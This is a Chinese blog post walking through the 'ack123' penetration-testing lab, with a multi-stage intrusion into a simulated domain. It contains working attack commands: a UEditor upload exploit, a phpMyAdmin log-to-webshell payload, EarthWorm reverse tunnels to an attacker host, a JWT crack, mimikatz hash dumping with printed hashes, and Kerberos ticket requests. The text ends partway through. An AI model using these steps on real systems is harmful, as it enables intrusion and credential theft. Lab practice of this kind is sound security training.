ack123复现

CDxiaodong · 发表于 2021-11-27 16:45:48

ack123（2021.9月的靶场）复现
攻击机：
kali ： 192.168.19.128
win ： 192.168.19.1
靶机：
第一层：NAT :web1 ：192.168.59.136
第二层：VMnet 18： data1 ；web1 ； web2
第三层：web2 ；dc1 data2
攻击流程
→web1→横向data1→穿透（防火墙）web2→横向dc1→横向data2
配置一下ip
web1：e0 192.168.59.136 e1 192.168.22.1

配置到一半其实已经可以进去了，带还是想再配置到外网，这样win和kali都能进行攻击了
而且对以后实战外带内网机也有用
将web1通过frp外带到vps服务器上
服务器（frp客户端）操作：
frps.ini

web1服务端
frpc.ini

弄个xml直接自启动frp也行
辣鸡阿里云会自动把我的frps删掉
算了，直接kali使用吧
开搞：
打开网页
f12发现网站爆有cookie

bp越权

这里有个百度插件，一看这个ueditor插件就知道有漏洞验证一下
http://www.ackmoon.com/admin/net/controller.ashx?action=catchimage

漏洞复现
透过此漏洞新建html上传点

shell addr:

打开上传图片码（gif.apex（自动）（编辑器需求））webshell

发现站库分离和xp

连接上这个服务器
且这个服务器可以执行xpcmdshll
ps：如果不能执行的话，里面有个add xpcmdshell 或者运行下列代码增加xpcmdshell

这里有个上传
做一下360免杀载荷

生成raw云端码.bin
加壳免杀生成exe--上传

成功上线

先把sleep设置为0
扫一下有内网里有无其他机器

直接cs自带提权
右键-执行-提权-59.128监听器（svc-exe）

然后扫一下22.133这个机器开放的端口

22.133就是data1 ，还有台web2 忘记开了再扫一遍看看
哦
我忘记改web的eth0了
改一下互ping一下，可以

接下来吧ew传入web1开个隧道!

直接在kali上或者vps服务器上运行ew_for_Win.exe -s rcsocks -l 1080 -e 1024
cs上执行web1命令：shell C:\Windows\Temp\ew_for_Win.exe -s rssocks -d 114.55.35.173 -e 1024
连接不上

本地连接看下哪里出了问题

本地也连不上
好的你个臭屁阿里云
直接kali试试
./ew_for_Linux32 -s rcsocks -l 1080 -e 1024
cs上执行web1命令：shell C:\Windows\Temp\ew_for_Win.exe -s rssocks -d 192.168.59.128 -e 1024

ok成功连接 kali proxy代理一下
vim /etc/proxychains4.conf
socks 192.168.59.128 1080
proxy nmap扫一下，看下能不能用
proxychains4 nmap -Pn -sT 192.168.22.135 -p445,80

好像不能用
好的本地主机（vmnet8 192.168.59.1）连cs进去
然后下载sockcap试一下

记得以管理员方式运行

试一下能不能用不能用的话很可能是vps（192.168.59.128）的问题，小概率是ew或者web1的问题
哦可以直接测试看下能不能连接

看下能不能打开web2（192.168.22.135）

咋回事
我看下web1和data1能不能进去

都能进去奇了怪了 = =

可是这里都有回想啊
证明ew是没问题的，代理也没问题，vps也没问题，而且web1和data1都能打开web2
是哪里出了问题，令人深思
重新打开ew 使用qq浏览器代理 nice 成功打开

再用别的浏览器打开看下行不行
edge不行 emmm可能是浏览器的原因也可能是多进程占用的原因

其他软件也不行，emm
不管了继续
登录进来(给了默认账号密码)

f12-网络-usr.php响应头中爆出了jwt的x-token
X-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC8xMC4xMC4xLjEzNSIsImF1ZCI6Imh0dHA6XC9cLzEwLjEwLjEuMTM1IiwiaWF0IjoxNjM3ODI5OTQ1LCJuYmYiOjE2Mzc4Mjk5NTUsImV4cCI6MTYzNzgzMDU0NSwiZGF0YSI6eyJ1c2VyaWQiOjEsInVzZXJuYW1lIjoiZGVtbyJ9fQ.9oVhj3v7EQvOO66xHQBjjO3epGGlbmLedsjRu-NSXsw一般e开头的都是jwt
拿去jwt.io解密一下

里面有个密钥“your-256-bit-secret”
token放进kali破解一下
hashcat -m 16500 jwt.txt -a 3 -w 3 /usr/share/wordlists/rockyou.txt -o 5.txt

Qweasdzxc5
前面拿到的网页head头有apche那些head引擎版本，拿去搜一下
“phpapchexxxxxxxxxxx”
利用这些控件找到phpmyadmin入口/phpMyAdmin4.8.5/

当然因为win的目录解析不管大小写，直接phpmyadmin各版本爆目录也行（当然也是查控件后知道有phpmyadmin的存在）
账号密码就是root：Qweasdzxc5
然后phpmyadmin日志写shell
SET global general_log = "ON"; 日志保存状态开启
SET global general_log_file = 'C:/phpstudy_pro/WWW/4567.php'; 修改日志的保存位置

SELECT '<?php phpinfo();eval($_REQUEST[cmd]);?>'

访问一下
http://192.168.22.135/4567.php?cmd=system(%27whoami%27);

ok，菜刀代理连接一下

连接的时候报错
用蚁剑代理试一下

一般进去之后应该再写个后门abc.php已维持一下
这里懒得维持了
tasklist看下有没有杀毒程序

好像没有
又到了熟悉的cs转发上线了
之前两个靶场都失败了，感觉这次能成功，如果成功了有可能是我ip配置的问题（我也忘了我那两个靶场的ip啥配置，反正我没有去配置他们，让他们自动ip）
我有四次机会 kali和win的两个cs 两个肉鸡（web1和data1）
放到/WWW超时了
直接放c盘

ok 运行
直接成功

= =
我惊呆了
那一定是之前靶场ip的配置问题
惯例改一下回连间隔为0
到点了回宿舍泡脚早睡早起
接下来打第三层！

好像是因为一天没打了，代理自己关了，前天也这样，重新打开连一下就好了。当然我选择不重新弄，
因为我第二层的中转服务器都进去了

看一下有个 enet1 10.10.10.137 想必就是第三层内网了。
横向探测一下（ps：今天才看了大佬的文章，有些内网是不能直接这么大流量扫的。msf更要开线程1，因为他们内网往往会部署自动检测环境把它检测出来，然后就前功尽弃了。所以说权限维持也很重要）
扫半天啥没扫出来才发现我dc1和data2忘记开了啊哈

dc1是10.10.10.135
那么data2就是10.10.10.136了
巨龙拉冬域内信息获取一下

net view 一下不知道为啥没有扫出data2出来
我看了下靶机，原来是没有关闭防火墙
利用spn针对ack123.com这个域扫一下
shell setspn -T ack123.com -q */*正在检查域 DC=ack123,DC=comCN=Administrator,CN=Users,DC=ack123,DC=com mysql/16server-dc1.ack123.com CN=16SERVER-DC1,OU=Domain Controllers,DC=ack123,DC=com //dc1 Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/16server-dc1.ack123.com ldap/16server-dc1.ack123.com/ForestDnsZones.ack123.com ldap/16server-dc1.ack123.com/DomainDnsZones.ack123.com DNS/16server-dc1.ack123.com GC/16server-dc1.ack123.com/ack123.com RestrictedKrbHost/16server-dc1.ack123.com RestrictedKrbHost/16SERVER-DC1 RPC/fc2c7a98-defb-4143-8052-ec1832c2a8f0._msdcs.ack123.com HOST/16SERVER-DC1/ACK123 HOST/16server-dc1.ack123.com/ACK123 HOST/16SERVER-DC1 HOST/16server-dc1.ack123.com HOST/16server-dc1.ack123.com/ack123.com E3514235-4B06-11D1-AB04-00C04FC2DCD2/fc2c7a98-defb-4143-8052-ec1832c2a8f0/ack123.com ldap/16SERVER-DC1/ACK123 ldap/fc2c7a98-defb-4143-8052-ec1832c2a8f0._msdcs.ack123.com ldap/16server-dc1.ack123.com/ACK123 ldap/16SERVER-DC1 ldap/16server-dc1.ack123.com ldap/16server-dc1.ack123.com/ack123.comCN=krbtgt,CN=Users,DC=ack123,DC=com kadmin/changepwCN=12SERVER-DATA2,CN=Computers,DC=ack123,DC=com WSMAN/12server-data2 WSMAN/12server-data2.ack123.com RestrictedKrbHost/12SERVER-DATA2 HOST/12SERVER-DATA2 RestrictedKrbHost/12server-data2.ack123.com HOST/12server-data2.ack123.comCN=12SERVER-WEB2,CN=Computers,DC=ack123,DC=com TERMSRV/12SERVER-WEB2 TERMSRV/12server-web2.ack123.com WSMAN/12server-web2 WSMAN/12server-web2.ack123.com RestrictedKrbHost/12SERVER-WEB2 HOST/12SERVER-WEB2 RestrictedKrbHost/12server-web2.ack123.com HOST/12server-web2.ack123.com发现存在 SPN!第二行看到有个mysql打开
看下怎么破解mysql的密文
先看下web2主机的进程
找到域内进程进行注入

向这些都是域内的，只不过这里没有写出来（ackmoon）

注入进程（监听端口就为中转监听端口）
再给第一个web2上传一个mimikatz 拿票据
抓一下它的hash去破解

不行
不对劲，想了好久试试提权

可以，起了怪了本来也是system权限啊，咋就抓不了hash了
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b78ee36a79ed9763b66519f86825a6bd:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::moonsec:1001:aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387:::到cmd5去破解一下
在注入web2创建票据
mimikatz kerberos::ask /target:mysql/16server-dc1. ack123.com